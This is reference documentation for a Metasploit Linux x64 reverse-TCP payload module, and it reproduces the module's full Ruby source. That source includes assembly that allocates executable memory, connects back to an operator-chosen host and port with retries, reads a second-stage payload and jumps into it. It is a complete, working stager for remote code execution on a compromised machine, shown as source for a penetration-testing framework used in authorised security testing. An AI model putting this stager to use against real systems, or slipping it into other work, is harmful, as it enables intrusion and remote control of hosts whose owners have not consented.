Module: Msf::Payload::Linux::ReverseTcp_x64

Includes:
Msf::Payload::Linux, TransportConfig
Defined in:
lib/msf/core/payload/linux/x64/reverse_tcp_x64.rb

Overview

Complex reverse TCP payload generation for Linux ARCH_X64

Constant Summary

Constants included from Rex::Payloads::Meterpreter::UriChecksum

Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_CONN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_CONN_MAX_LEN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITJ, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITP, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITW, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INIT_CONN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_MIN_LEN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_MODES, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_UUID_MIN_LEN

Instance Method Summary collapse

Methods included from Msf::Payload::Linux

#apply_prepends, #initialize

Methods included from TransportConfig

#transport_config_bind_named_pipe, #transport_config_bind_tcp, #transport_config_reverse_http, #transport_config_reverse_https, #transport_config_reverse_ipv6_tcp, #transport_config_reverse_named_pipe, #transport_config_reverse_tcp, #transport_config_reverse_udp, #transport_uri_components

Methods included from UUID::Options

#generate_payload_uuid, #generate_uri_uuid_mode, #initialize, #record_payload_uuid, #record_payload_uuid_url

Methods included from Rex::Payloads::Meterpreter::UriChecksum

#generate_uri_checksum, #generate_uri_uuid, #process_uri_resource, #uri_checksum_lookup

Methods included from Pingback::Options

#initialize

Instance Method Details

#asm_reverse_tcp(opts = {}) ⇒ Object

Generate an assembly stub with the configured feature set and options.

Parameters:

  • opts (Hash) (defaults to: {})

    a customizable set of options

Options Hash (opts):

  • :port (Integer)

    The port to connect to

  • :host (String)

    The host IP to connect to

  • :reliable (Bool)

    Whether or not to enable error handling code



77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
# File 'lib/msf/core/payload/linux/x64/reverse_tcp_x64.rb', line 77

def asm_reverse_tcp(opts={})
  # TODO: reliability is coming
  retry_count  = opts[:retry_count]
  reliable     = opts[:reliable]
  encoded_port = "%.8x" % [opts[:port].to_i,2].pack("vn").unpack("N").first
  encoded_host = "%.8x" % Rex::Socket.addr_aton(opts[:host]||"127.127.127.127").unpack("V").first
  seconds = (opts[:sleep_seconds] || 5.0)
  sleep_seconds = seconds.to_i
  sleep_nanoseconds = (seconds % 1 * 1000000000).to_i

  if respond_to?(:generate_intermediate_stage)
    pay_mod = framework.payloads.create(self.refname)
    read_length = pay_mod.generate_intermediate_stage(pay_mod.generate_stage(datastore.to_h)).size
  elsif !module_info['Stage']['Payload'].empty?
    read_length = module_info['Stage']['Payload'].size
  else
    read_length = 4096
  end

  asm = %Q^
    mmap:
      xor    edi, edi
      push   0x9
      pop    rax
      cdq
      mov    dh, 0x10
      mov    rsi, rdx
      xor    r9, r9
      push   0x22
      pop    r10
      push   0x7
      pop    rdx
      syscall ; mmap(NULL, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0)
      test   rax, rax
      js failed

      push   #{retry_count}        ; retry counter
      pop    r9
      push   rax
      push   0x29
      pop    rax
      cdq
      push   0x2
      pop    rdi
      push   0x1
      pop    rsi
      syscall ; socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
      test   rax, rax
      js failed

      xchg   rdi, rax

    connect:
      mov    rcx, 0x#{encoded_host}#{encoded_port}
      push   rcx
      mov    rsi, rsp
      push   0x10
      pop    rdx
      push   0x2a
      pop    rax
      syscall ; connect(3, {sa_family=AF_INET, LPORT, LHOST, 16)
      pop    rcx
      test   rax, rax
      jns    recv

    handle_failure:
      dec    r9
      jz     failed
      push   rdi
      push   0x23
      pop    rax
      push   0x#{sleep_nanoseconds.to_s(16)}
      push   0x#{sleep_seconds.to_s(16)}
      mov    rdi, rsp
      xor    rsi, rsi
      syscall                      ; sys_nanosleep
      pop    rcx
      pop    rcx
      pop    rdi
      test   rax, rax
      jns    connect

    failed:
      push   0x3c
      pop    rax
      push   0x1
      pop    rdi
      syscall ; exit(1)

    recv:
      pop    rsi
      push   0x#{read_length.to_s(16)}
      pop    rdx
      syscall ; read(3, "", #{read_length})
      test   rax, rax
      js     failed

      jmp    rsi ; to stage
  ^

  asm
end

#generate(_opts = {}) ⇒ Object

Generate the first stage



20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
# File 'lib/msf/core/payload/linux/x64/reverse_tcp_x64.rb', line 20

def generate(_opts = {})
  conf = {
    port:        datastore['LPORT'],
    host:        datastore['LHOST'],
    retry_count:   datastore['StagerRetryCount'],
    sleep_seconds: datastore['StagerRetryWait'],
  }

  # Generate the advanced stager if we have space
  if self.available_space && required_space <= self.available_space
    conf[:exitfunk] = datastore['EXITFUNC']
  end

  generate_reverse_tcp(conf)
end

#generate_reverse_tcp(opts = {}) ⇒ Object

Generate and compile the stager



51
52
53
54
# File 'lib/msf/core/payload/linux/x64/reverse_tcp_x64.rb', line 51

def generate_reverse_tcp(opts={})
  asm = asm_reverse_tcp(opts)
  Metasm::Shellcode.assemble(Metasm::X64.new, asm).encode_string
end

#include_send_uuidObject

By default, we don’t want to send the UUID, but we’ll send for certain payloads if requested.



40
41
42
# File 'lib/msf/core/payload/linux/x64/reverse_tcp_x64.rb', line 40

def include_send_uuid
  false
end

#required_spaceObject

Determine the maximum amount of space required for the features requested



59
60
61
62
63
64
65
66
67
68
# File 'lib/msf/core/payload/linux/x64/reverse_tcp_x64.rb', line 59

def required_space
  # Start with our cached default generated size
  space = 300

  # Reliability adds 10 bytes for recv error checks
  space += 10

  # The final estimated size
  space
end

#transport_config(opts = {}) ⇒ Object



44
45
46
# File 'lib/msf/core/payload/linux/x64/reverse_tcp_x64.rb', line 44

def transport_config(opts={})
  transport_config_reverse_tcp(opts)
end